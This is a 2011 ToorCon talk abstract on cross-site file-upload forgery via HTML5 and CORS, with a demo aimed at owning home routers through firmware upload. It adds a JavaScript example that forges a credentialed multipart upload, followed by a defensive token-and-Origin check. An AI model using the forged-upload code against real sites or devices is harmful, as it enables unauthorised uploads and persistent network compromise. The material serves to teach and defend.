Post-Exploitation With Javascript - The New Cross-Site F-U!

Presented at ToorCon San Diego 13 (2011), Oct. 9, 2011, 4:30 p.m. (20 minutes)

Many sites that have countermeasures for CSRF forget to apply the same mechanisms to their file upload functionality. This was not a problem until recently, but new functionality added to JavaScript now lets us abuse that oversight. This presentation will demonstrate how a browser can be tricked into submitting an arbitrary file to a web application. Some might call this "Advanced Persistent CSRF", but the W3C specification just calls it a feature. Thanks to HTML5 and Cross-Origin Resource Sharing, no plugins are required, and the newer your browser is, the more likely you are to be exposed to this attack. I'll show you why this makes attacking web apps even more fun than ever before.

There will be a live demo showing how this technique can be used to completely own your friends' home routers, giving access far beyond remote administration: we upload customized firmware that provides us with persistent access to the network.
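The mechanism the abstract describes, as an added example that is not code from the talk or from the presenter: a page on an attacker's origin hand-builds a multipart/form-data body (the way XHR2-era exploits did it, before FormData and Blob were everywhere) and has the victim's browser POST it, with cookies, to a cross-origin upload endpoint. Because multipart/form-data is a CORS "simple" content type, no preflight is sent; the browser only withholds the response from the attacker's script, and by then the file has already been uploaded. The second half shows the check the upload handler needs, which is the same anti-CSRF token and Origin check the site's ordinary forms already use. The target host, the `/upload` path, the `firmware` and `csrf` field names, the token value and the boundary string are all hypothetical.

```javascript
// Added example (not from the talk). Hypothetical names: target.example, /upload,
// the "firmware" file field, the "csrf" token field and the boundary below.
const BOUNDARY = "----ToorConBoundary7f3a9c";

// Hand-build a multipart/form-data body. A browser submitting a real
// <form enctype="multipart/form-data"> with a file input sends exactly this
// shape, so the server cannot tell a forged upload from a real one by the body.
function buildMultipartUpload(fields, file, boundary = BOUNDARY) {
  let body = "";
  for (const [name, value] of Object.entries(fields)) {
    body += `--${boundary}\r\nContent-Disposition: form-data; name="${name}"\r\n\r\n${value}\r\n`;
  }
  body += `--${boundary}\r\n` +
    `Content-Disposition: form-data; name="${file.field}"; filename="${file.name}"\r\n` +
    `Content-Type: ${file.type}\r\n\r\n${file.content}\r\n--${boundary}--\r\n`;
  return body;
}

// The request the attacker's page asks the victim's browser to send.
// multipart/form-data is a CORS-safelisted content type, so there is no
// preflight: the browser attaches the victim's cookies (credentials: include)
// and sends the POST. It adds its own Origin header, which script cannot change.
function forgeUploadRequest(targetUrl, file, extraFields = {}) {
  return {
    method: "POST",
    url: targetUrl,
    headers: { "Content-Type": `multipart/form-data; boundary=${BOUNDARY}` },
    credentials: "include",
    body: buildMultipartUpload(extraFields, file),
  };
}

// In a browser the attacker's page would fire it like this (not run here):
//   const r = forgeUploadRequest("https://target.example/upload", firmware);
//   const xhr = new XMLHttpRequest();
//   xhr.open(r.method, r.url);
//   xhr.withCredentials = true;
//   xhr.setRequestHeader("Content-Type", r.headers["Content-Type"]);
//   xhr.send(r.body);

// ---- Defender side ----

// Minimal multipart parser for this example: return the value of one part by
// field name, or null if absent. Handles both plain and file parts.
function getMultipartField(body, boundary, name) {
  const partRe = /^\r\nContent-Disposition: form-data; name="([^"]*)"(?:; filename="[^"]*")?\r\n(?:Content-Type: [^\r\n]*\r\n)?\r\n([\s\S]*?)\r\n$/;
  for (const part of body.split(`--${boundary}`)) {
    const m = partRe.exec(part);
    if (m && m[1] === name) return m[2];
  }
  return null;
}

// Accept an upload only if the multipart body carries the session's anti-CSRF
// token AND the browser-supplied Origin (or Referer) names our own origin.
// The token is the real control; the Origin check is defense in depth.
function uploadRequestAllowed(req, expectedToken, ownOrigin) {
  const ct = req.headers["Content-Type"] || req.headers["content-type"] || "";
  const bm = /boundary=([^;]+)/.exec(ct);
  if (!bm) return false;
  if (getMultipartField(req.body, bm[1], "csrf") !== expectedToken) return false;
  const src = req.headers["Origin"] || req.headers["Referer"] || "";
  return src === ownOrigin || src.startsWith(ownOrigin + "/");
}
```

The forged request carries the victim's cookies but not the token, and its Origin is the attacker's page; either check alone rejects it. Rate-limiting or authenticating the upload endpoint by cookie alone does nothing here, since the cookie is exactly what the browser supplies on the attacker's behalf.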


Presenters:

  • Phil Purviance (superevr)
    Phil Purviance is an Information Security Specialist for AppSec Consulting, Inc. He has found critical vulnerabilities in hundreds of web sites, and is on the Google and Facebook Security Halls of Fame. His past exploit talks include cross-site scripting vulnerabilities in Skype for iOS, and revealing flaws in the Ruby on Rails and Django web frameworks.
